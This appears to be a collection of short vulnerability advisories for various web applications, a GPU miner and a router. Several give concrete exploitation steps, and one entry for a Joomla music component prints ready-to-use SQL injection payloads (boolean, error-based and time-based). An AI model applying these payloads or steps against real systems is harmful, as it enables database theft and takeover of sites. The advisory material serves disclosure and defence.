The vulnerability allows an attacker to inject sql commands by exploiting the vulnerable parameters in the 'getPlacemarkDetails' and 'getPlacemarkHoverText' functions of the 'controller.php' file.
Claymore’s Dual GPU Miner 10.5 and below is vulnerable to a format strings vulnerability. This allows an unauthenticated attacker to read memory addresses, or immediately terminate the mining process causing a denial of service. After realizing the buffer was printed, sending %s does return some strings, however I couldn’t get the hex addresses padded properly to dig in more as I kept getting unable to parse json errors. Sending %p also did yield some results but I’m sure someone more qualified may be able to exploit the stack further. Finally, sending %n completely kills the mining process.
A vulnerability in WordPress allows an attacker to send a specially crafted request to the load-scripts.php file, which can cause a denial of service. The vulnerability is caused by the lack of proper validation of the 'load' parameter, which can be exploited to cause a denial of service. The vulnerability is present in WordPress versions prior to 5.5.3.
The application allows illegitimate host header manipulation and leads to aribtary web page re-direction. This can also lead to severe attacks such as password reset or web cache poisoning. To exploit, intercept any web request of cms using a proxy tool and change the http host header to: POST / HTTP/1.1 Host: google.com. You can observe the page being re-directed and the Location header changed in response to: http://www.google.com/
A vulnerability in WonderCMS allows an authenticated user to upload a malicious file with a php extension containing malicious code. This code can be executed by adding ?cmd= to the URL followed by a system command such as whoami,time,date etc. This vulnerability can be exploited by an authenticated user with low privileges.
Vulnerability exists in web interface of FIBERHOME AN5506-04-F router. This router has vulnerabilities where you can get information or edit configurations in an unauthenticated way. The biggest risk is the possibility of changing the dns of the device. Modifying systems' DNS settings allows cybercriminals to perform malicious activities like steering unknowing users to bad sites, replacing ads on legitimate sites, controlling and redirecting network traffic, and pushing additional malware.
The vulnerability allows an attacker to inject sql commands. Proof of Concept: 1) http://localhost/[PATH]/index.php?option=com_jmsmusic&view=search&keyword=[SQL] Parameter: keyword (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: option=com_jmsmusic&view=search&keyword=-5694' OR 3737=3737# Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: option=com_jmsmusic&view=search&keyword=Efe' AND (SELECT 5924 FROM(SELECT COUNT(*),CONCAT(0x7178787671,(SELECT (ELT(5924=5924,1))),0x716b626b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- BeNf Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: option=com_jmsmusic&view=search&keyword=Efe' OR SLEEP(5)-- EoWI 2) http://localhost/[PATH]/index.php?option=com_jmsmusic&view=album&id=[SQL] Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: option=com_jmsmusic&view=album&id=-5694' OR 3737=3737# Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: option=com_jmsmusic&view=album&id=Efe' AND (SELECT 5924 FROM(SELECT COUNT(*),CONCAT(0x7178787671,(SELECT (ELT(5924=5924,1))),0x716b626b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- BeNf Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: option=com_jmsmusic&view=album&id=Efe' OR SLEEP(5)-- EoWI
The vulnerability allows an attacker to inject sql commands by sending a maliciously crafted HTTP request to the vulnerable application. An attacker can exploit this vulnerability to gain access to sensitive information stored in the application's database.
The vulnerability allows an attacker to inject sql commands into the vulnerable parameter 'id' of the 'index.php' file. An attacker can send a specially crafted HTTP request to the vulnerable application in order to execute arbitrary SQL commands in application's database.
The vulnerability allows an attacker to inject sql commands into the vulnerable parameters 'id' and 'slug' of the 'event.php' and 'page.php' scripts respectively.